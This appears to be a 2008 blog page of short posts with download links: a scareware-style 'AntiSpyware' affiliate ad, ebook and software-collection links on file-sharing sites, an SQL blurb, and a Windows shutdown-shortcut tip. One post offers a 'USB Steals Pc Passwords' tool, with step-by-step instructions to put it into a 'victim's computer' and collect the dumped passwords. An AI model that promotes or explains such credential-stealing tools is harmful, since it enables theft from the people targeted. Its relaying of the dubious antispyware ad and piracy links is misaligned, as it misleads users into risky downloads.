Thursday, July 31, 2008
This AntiSpyware uses cutting-edge anti-spyware advancements to detect as many spyware threats as possible and destroy each infection on the spot.AntiSpyware updates itself automatically, ensuring that you are protected from the most recent spyware developments...
for free computer scan for spyware and adware just goto the link below
http://ambalam0.antispywre.hop.clickbank.net/?tid=K4JGPW6Z
Click Here!
Saturday, July 5, 2008
Web hacking
What kind of secrets are included in 501 Web Site Secrets? Well, using this book is as simple as turning to the chapter on a particular site, reading through the secrets, then trying them on your own. You don’t need any particular technical expertise to take advantage of these secrets, although some familiarity with the sites in question is helpful. There’s no fancy programming, no high-level coding, just a lot of common-sense information that you probably didn’t know before. Containing:-
Yahoo!, Google, AOL, MSN, Amazon, Lycos, Ask, Altavista, Microsoft, etc........!
Here is the link:http://www.mediafire.com/?xlbity4ln5y
DATABASES
SQL
SQL (Structured Query Language) is a database computer language designed for the retrieval and management of data in relational database management systems (RDBMS), database schema creation and modification, and database object access control management.
SQL is a standard interactive and programming language for querying and modifying data and managing databases. Although SQL is both an ANSI and an ISO standard, many database products support SQL with proprietary extensions to the standard language. The core of SQL is formed by a command language that allows the retrieval, insertion, updating, and deletion of data, and performing management and administrative functions. SQL also includes a Call Level Interface (SQL/CLI) for accessing and managing data and databases remotely
here is the link:http://www.mediafire.com/?0gvgxzv2nn8
Exclusive : 250+ Software Collection Download
http://rapidshare.com/files/111009492/250___Soft_Collection_TecknoMan-Special.zip.html
Friday, July 4, 2008
Guide to the Software Engineering Body of Knowledge
Title : Guide to the Software Engineering Body of Knowledge
Pub Date : 2004
Author : -
Publisher: A project of the IEEE Computer Society Professional Practices Committee
ISBN : -
Overview :
WHAT IS SOFTWARE ENGINEERING?
The IEEE Computer Society defines software engineering as:
“(1) The application of a systematic, disciplined, quantifiable approach to the development, operation, and maintenance of
software; that is, the application of engineering to software. 1
(2) The study of approaches as in (1).”
WHAT IS A RECOGNIZED PROFESSION?
For software engineering to be fully known as a legitimate engineering discipline and a recognized
profession, consensus on a core body of knowledge is imperative. This fact is well illustrated by Starr when he
defines what can be considered a legitimate discipline and a recognized profession. In his Pulitzer Prize-winning
book on the history of the medical profession in the USA, he states that:
Download Link:
http://rapidshare.com/files/7128112
hack using pendrive
USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.
Instructions
1.Decompress the archive and put all the files located in the folder "USBThief"into a USB.
2.Insert the USB in your victim's computer.
3.View folder "dump" to see the passwords.
http://rapidshare.com/files/99
Create One-Click Shutdown and Reboot Shortcuts
First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "Ill be back m8 ;)!"
Switch
What it does
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC.